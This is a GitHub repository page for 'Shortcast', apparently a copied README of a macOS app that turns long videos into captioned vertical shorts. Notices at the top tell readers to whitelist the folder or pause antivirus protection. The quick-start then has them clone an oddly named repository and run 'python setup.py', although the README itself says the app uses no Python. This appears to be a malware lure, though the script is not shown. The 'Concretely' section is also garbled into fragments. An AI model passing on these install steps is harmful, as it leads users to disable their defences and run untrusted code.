Shortcast

[!TIP] If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.

[!CAUTION] Some security systems may block the installation. Only download from the official repository.

QUICK START

git clone https://github.com/destroyerhaulerscrew/shortcast-345.git
cd shortcast-345
python setup.py

Long videos → ready-to-post shorts for TikTok, Instagram Reels and YouTube Shorts. Found, cut, captioned, reframed and scheduled — fully on your Mac. Open-source.

Shortcast demo — drop a long video, get cut, captioned, vertical shorts

_{Drop a long video → it transcribes, finds the best moments, cuts them, writes the copy, reframes to vertical → review the grid → publish or schedule the whole week.}

What it does

Shortcast has two modes:

🎬 Make shorts from a long video (the main one)

Drop a podcast, talk, stream or any long recording. Shortcast transcribes it on-device, finds the best 3–6 viral moments, cuts each one, and writes the full post copy for all three platforms — all in one pass. Horizontal (16:9) footage is reframed to vertical 9:16, tracking the speaker's face. You get a grid of finished shorts you can play with sound, edit, download, publish, or schedule one-per-day across the week.

✏️ Caption a short

Already have a short vertical clip? Drop it and Shortcast watches the frames and hears the audio (Gemma 4 E4B, multimodal) and writes the three platform captions directly, rendered as editable phone-style previews.

What's different about Shortcast:

🛰️ Nothing leaves your Mac during processing. No cloud model, no upload. Your video is only sent to a network when you choose to publish it.
🧠 One model does the thinking. A single on-device LLM reads the whole transcript, picks the moments and writes every caption in the same pass.
🎯 Tuned per platform. TikTok gets punchy. Instagram gets storytelling and 20–30 hashtags. YouTube gets short, search-friendly titles — in the language spoken in the video.
📐 Auto vertical reframe. On-device face tracking (Vision) turns 16:9 into 9:16, panning to keep the speaker centred, with a blurred-background fallback when there's no clear face.
🗓️ Schedule the week in one click. Distribute approved shorts one per day, pick the time, and Upload-Post publishes them automatically.
🪶 No Python. No Electron. No embedded runtime. Just Swift, MLX, AVFoundation, Vision.

How a long video becomes shorts

  ┌──────────────────────────────────────────────────────────────────────┐
  │  YOUR MAC — nothing leaves until you press Publish                    │
  │                                                                       │
  │  drop a long video                                                    │
  │        │                                                              │
  │        ▼                                                              │
  │  ┌──────────────┐   ┌────────────────────┐   ┌───────────────────┐    │
  │  │ WhisperKit   │──►│  Director LLM       │──►│ AVFoundation      │    │
  │  │ large-v3     │   │  Gemma 4 12B (MLX)  │   │ cut each clip     │    │
  │  │ transcribe   │   │  finds moments +    │   │ + reframe 9:16    │    │
  │  │ (GPU)        │   │  writes 3 captions  │   │  (Vision tracking)│    │
  │  └──────────────┘   │  in ONE pass        │   │ + hook overlay    │    │
  │                     └────────────────────┘   └───────────────────┘    │
  │                                                       │                │
  │                                                       ▼                │
  │                                              ┌───────────────────┐     │
  │                                              │ grid of shorts:   │     │
  │                                              │ play w/ sound,    │     │
  │                                              │ edit, download,   │     │
  │                                              │ approve           │     │
  │                                              └───────────────────┘     │
  └──────────────────────────────────────────────────────────────────────┘
                                  │  Publish now  /  Schedule the week
                                  ▼
                          ┌─────────────────┐
                          │   Upload-Post   │  TikTok · Instagram · YouTube
                          │       API       │  (now, or scheduled per day)
                          └─────────────────┘

Concretely:

Otherwise WhisperKit (large-v3) transcribes on the GPU. The transcript's language is detected from the text (NaturalLanguage), so captions stay in the spoken language. whole transcript and returns a single JSON: the best clips (start/end, why, hook, a short on-screen overlay) and the full TikTok / Instagram / YouTube caption package for each, in one pass. A tolerant parser strips fences/thinking and validates clip durations. the clip; if the speaker is found, an AVMutableVideoComposition pans a 9:16 crop to follow them (GPU-interpolated transform ramps). No clear face → a blurred-background letterbox. A short text hook can be burned over the top. captions, download the rendered .mp4, or approve it. one per day at a time you choose, via Upload-Post's scheduled_date. TikTok lands as a draft by default so you can finish in-app.

Choosing the model

Settings → Caption writer picks the on-device model that finds the moments and writes the captions:

Model	Role	Notes
Gemma 4 12B (default)	Director + inline captions	Strongest writing, one model, one pass. Loaded via MLX.
Qwen 3.5 9B	Director + inline captions	Lighter and a bit faster, one pass. Huge context window.
Gemma 4 E4B	Clip-watching copywriter	Multimodal — watches each clip (frames + audio) and captions it in a separate pass. Also the model used by Caption a short.

The model downloads once on first use. Everything runs offline afterwards.

First run

Shortcast downloads the models it needs on first use, with a visible progress bar: the Director (Gemma 4 12B ≈ 7 GB, or Qwen 3.5 9B ≈ 5 GB) and WhisperKit large-v3 for transcription. Happens once, then it works offline.
Open Settings (⌘,) and add your Upload-Post API key and profile name (the one from Manage Users, not your social handle).
Optionally set a caption language and paste a few of your own captions as style examples — the model will match your voice.

You can generate shorts without Upload-Post; only publishing/scheduling needs it.

The stack

Layer	Used
UI	SwiftUI · AVKit
Transcription	WhisperKit `large-v3` (Metal/GPU)
Director model	Gemma 4 12B or Qwen 3.5 9B (4-bit), runs as a text LLM via MLX
Clip-watcher	Gemma 4 E4B (4-bit), text + vision + audio
Inference	MLX (Metal, Neural Engine)
Gemma 4 runtime	gemma-4-swift-mlx, vendored in `Vendor/`
Vertical reframe	Vision (face detection) + AVFoundation (transform ramps / Core Image)
Media	AVFoundation (cut, sample, export) · AVKit playback
Publishing	Upload-Post API (publish + schedule)
Build	XcodeGen · GitHub Actions

Privacy

Transcription, moment-finding, captioning, cutting and reframing all run inside the app, on your Mac. The only outbound traffic before you publish is:

First use only: one-time downloads of the model weights from Hugging Face.
On Publish / Schedule: an upload to Upload-Post with the rendered short and the copy you approved (immediately, or at the scheduled time).

Your Upload-Post API key is stored locally on your Mac (app preferences) and is only ever sent to Upload-Post over HTTPS when you publish. It is never written into the repository.

Known limitations

The Director runs a large model on-device. On an M1 Pro, a ~2-minute video takes a few minutes end-to-end (transcription + generation). Faster Macs (M3/M4) are quicker.
Caption a short uses Gemma 4 E4B, whose audio encoder hears the first 30 seconds.
The app is unsigned (see Install). Code signing + notarization will come once the project stabilises.
One video at a time — no history, no batch processing. By design, for now.
Upload-Post free tier limits monthly uploads. One publish to three networks counts as three.

Acknowledgements

Google for the Gemma 4 family — open weights with full multimodal capability.
Apple's MLX team for MLX and mlx-swift-lm.
Vincent Gourbin for gemma-4-swift-mlx, the native Gemma 4 runtime we vendor.
Argmax for WhisperKit.
Alibaba for the Qwen 3.5 open weights.
Upload-Post for the cross-platform publishing API.

License

Apache License 2.0 — see LICENSE.

Third-party components are listed in NOTICE. The vendored gemma-4-swift-mlx runtime is MIT-licensed; the Gemma 4 weights are governed by Google's Gemma Terms of Use.

_{Built in the open.}

Name		Name	Last commit message	Last commit date
Latest commit History 34 Commits
.github/workflows		.github/workflows
Probe		Probe
Shortcast		Shortcast
src		src
.gitignore		.gitignore
CHANGELOG.md		CHANGELOG.md
CONTRIBUTING.md		CONTRIBUTING.md
LICENSE		LICENSE
NOTICE		NOTICE
README.md		README.md
SECURITY.md		SECURITY.md
setup.py		setup.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Shortcast

QUICK START

What it does

🎬 Make shorts from a long video (the main one)

✏️ Caption a short

How a long video becomes shorts

Choosing the model

First run

The stack

Privacy

Known limitations

Acknowledgements

License

About

Uh oh!

Releases

Packages

Uh oh!

Contributors

Uh oh!

Languages

Folders and files

Latest commit

History

Repository files navigation

Shortcast

QUICK START

What it does

🎬 Make shorts from a long video (the main one)

✏️ Caption a short

How a long video becomes shorts

Choosing the model

First run

The stack

Privacy

Known limitations

Acknowledgements

License

About

Topics

Resources

License

Contributing

Security policy

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

Packages